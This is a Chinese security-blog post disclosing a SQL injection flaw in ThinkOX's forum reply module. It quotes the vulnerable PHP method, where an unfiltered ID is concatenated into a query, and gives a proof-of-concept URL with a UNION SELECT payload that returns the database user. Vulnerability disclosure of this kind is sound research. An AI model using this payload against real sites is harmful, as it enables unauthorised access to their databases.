Thinkox 最新版 SQL 注入

没穿底裤 2020年1月1日06:07:47评论529 views字数 827阅读2分45秒阅读模式
摘要

ThinkOX参数未过滤导致SQL注入漏洞。
/Application/Forum/Model/ForumLzlReplyModel.class.php

ThinkOX参数未过滤导致SQL注入漏洞。
/Application/Forum/Model/ForumLzlReplyModel.class.php

  1. public function getLZLReplyList($to_f_reply_id, $order, $page=1, $limit) { $list = S('post_replylzllist_' . $to_f_reply_id); if ($list == null) { $list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select(); foreach ($list as $k => &$v) { $v['userInfo'] = query_user(array('avatar128', 'nickname', 'uid', 'space_url', 'icons_html'), $v['uid']); $v['content'] = op_t($v['content']); } unset($v); S('post_replylzllist_' . $to_f_reply_id, $list, 60); } $list = getPage($list, $limit, $page); return $list; }

其中

  1. $list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select();

未经过过滤带入SQL语句导致注入。

exp:

  1. http://0day5.com/thinkox/index.php?s=/forum/lzl/lzllist/to_f_reply_id/1%20and%201=2)union%20select%201,2,3,4,user(),6,7,8,9%23.html

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日06:07:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Thinkox 最新版 SQL 注入https://cn-sec.com/archives/76359.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息